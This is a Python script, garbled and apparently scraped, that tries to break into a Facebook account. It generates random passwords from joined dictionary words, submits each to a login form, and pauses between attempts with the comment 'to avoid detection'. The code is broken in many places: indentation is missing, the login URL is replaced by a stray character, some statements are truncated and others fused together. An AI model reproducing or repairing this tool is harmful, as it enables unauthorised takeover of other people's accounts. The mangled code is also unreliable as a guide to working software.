import urllib3
import time
import random
import nltk
import urllib.parse
Initialize NLTK words corpus'words')
english_words = set(word.lower() for word in nltk.corpus.words.words())
class FacebookLogin:
def init(self, user):
self.user = user
self.http = urllib3.PoolManager()
def login(self, password):
params = urllib.parse.urlencode({'email': self.user, 'pass': password})
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
# Now login
print('Trying password:', password)
res = self.http.request('POST', ">")
if b'logout.php' in
print("Login successful! Password:", password)
return True
print("Login failed for password:", password)
return False
except Exception as e:
print(f"An error occurred: {e}")
return False
def main():
min_words = int(input("Enter the minimum number of words for the password: "))
max_words = int(input("Enter the maximum number of words for the password: "))
fb_user = input('Enter your Facebook email: ')
max_attempts = int(input('Enter the maximum number of attempts: '))
success = False
tried_passwords = set()
attempt = 0
while not success and attempt < max_attempts:
# Generate a random password
password = generate_password(min_words, max_words)
if password not in tried_passwords:
fblogin = FacebookLogin(fb_user) if fblogin.login(password):
success = True
attempt += 1
time.sleep(2) # Add a delay to avoid detection
if not success:
print("Failed to find the correct password within the maximum number of attempts.")
def generate_password(min_words, max_words):
"""Generate a random password without spaces"""
word_list = nltk.corpus.words.words()
password = ''
num_words = random.randint(min_words, max_words)
while len(password) < 20: # Adjust the length limit as needed
chosen_words = random.sample(word_list, num_words)
candidate_password = ''.join(chosen_words)
if len(candidate_password) <= 20: # Adjust the length limit as needed
password = candidate_password
return password
if name == 'main':